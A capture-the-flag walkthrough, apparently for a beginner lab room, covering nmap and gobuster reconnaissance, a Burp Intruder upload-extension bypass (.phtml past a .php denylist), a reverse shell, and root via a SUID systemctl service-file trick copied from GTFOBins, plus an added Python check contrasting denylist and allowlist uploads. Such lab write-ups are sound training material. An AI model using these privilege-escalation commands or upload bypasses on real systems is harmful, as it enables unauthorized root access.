
Task 1 Deploy the machine

Task 2 Reconnaissance
There are many Nmap "cheatsheets" online that you can use too.
A quick Google search can help, or run nmap --help
Scan the box; how many ports are open?
For this I started with nmap -sV -v -O (target ip)
What version of the squid proxy is running on the machine?
Since we ran -sV we can already see Squid is 3.5.12
How many ports will Nmap scan if the flag -p-400 was used?
I know that -p-400 will scan ports 1 through 400
What is the most likely operating system this machine is running?
Since I ran the -O flag already, we could see it was Ubuntu
What port is the web server running on?
We can see that the Apache server is running on port 3333
It's essential to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (each of which can be a point of exploitation) is very important; don't forget that ports in a higher range might be open, so always scan ports above 1000 (even if you leave that check running in the background).
What is the flag for enabling verbose mode using Nmap?
We know from our reading that -v is verbose

Task 3 Locating directories using Gobuster
What is the directory that has an upload form page?
First we run
gobuster dir -u <ip>:<port> -w <wordlist-path>
Now we can see that we have a few places to look. We can use the same syntax with a path appended after the port, for example /css
Task 4 Compromise the Webserver
What common file type you’d want to upload to exploit the server is blocked? Try a couple to find out.
If we go to the website and try to upload different files, we will find .php files are blocked

We will fuzz the upload form to identify which extensions are not blocked.
To do this, we’re going to use BurpSuite. If you need clarification on what BurpSuite is or how to set it up, please complete our BurpSuite module first.

Run this attack, what extension is allowed?

- First we need to create a payload list containing:
- .php
- .php3
- .php4
- .php5
- .phtml
Next we need to capture the upload, so we navigate to the target ip:3333/internal/. Now we make sure our interceptor is on, capture the upload, and send it to Intruder. Once it is in Intruder we make sure the payload list is set and mark the extension as the payload position, i.e. shell§.php§. Then we can run our attack. We can see that the .phtml response has a smaller length than the others.
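The reason the .phtml request stands out is that the form only denylists .php. The following is an added example, not part of the walkthrough or the room, showing a denylist check beside an allowlist check and which of the tried extensions each lets through; the image-only allowlist and the random stored name are assumptions about what such a form should do.

```python
"""Why blocking only ".php" fails: denylist vs allowlist upload checks."""
import os
import secrets

# Only extension the room's upload form is observed to block.
DENYLIST = {".php"}
# The extensions tried in Intruder (constructed from the payload list above).
TRIED = [".php", ".php3", ".php4", ".php5", ".phtml"]
# Assumption: the form only needs images, so accept just these.
ALLOWLIST = {".jpg", ".jpeg", ".png", ".gif"}


def denylist_allows(filename: str) -> bool:
    """Vulnerable check: accept anything whose last extension is not denied."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in DENYLIST


def allowlist_allows(filename: str) -> bool:
    """Hardened check: exactly one extension, and it must be on the allowlist.

    Every dot is inspected, so 'shell.phtml.jpg' and 'shell.jpg.phtml'
    are both rejected, not just 'shell.phtml'.
    """
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False
    return "." + parts[1] in ALLOWLIST


def stored_name(filename: str) -> str:
    """Store an allowed file under a server-chosen random name."""
    if not allowlist_allows(filename):
        raise ValueError("extension not allowed")
    ext = "." + filename.lower().rsplit(".", 1)[1]
    return secrets.token_hex(8) + ext


def bypasses(check) -> list:
    """Return the tried extensions that a given check lets through."""
    return [ext for ext in TRIED if check("shell" + ext)]


if __name__ == "__main__":
    print("denylist lets through:", bypasses(denylist_allows))
    print("allowlist lets through:", bypasses(allowlist_allows))
```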
What is the name of the user who manages the webserver?
For this we need to get a reverse shell; if we follow the instructions given we can achieve this. Once our shell is connected we can look in the home directory and see that bill is the user listed.
What is the user flag?
For this we can just cd into bill and ls, and then we see a user.txt; if we cat that we get the flag

Task 5 Privilege Escalation
On the system, search for all SUID files. Which file stands out?
For this we need to see what has the SUID bit set. We can find this out by running the command in the hint: find / -user root -perm -4000 -exec ls -ldb {} \;
It’s challenge time! We have guided you through this far. Can you exploit this system further to escalate your privileges and get the final answer?
Become root and get the last flag (/root/root.txt)
This took a bit of work. First we know that systemctl may be our way in, so we can go to GTFOBins and search; we can see two attack vectors, and since the SUID bit is set we can use the first one. The commands I ran were:
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/outputroot"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
Doing this creates a temporary service which will allow us to view the root file. Next we need to cd to /tmp/ because that's where we sent the output file, and then we can cat the output file to get our flag.
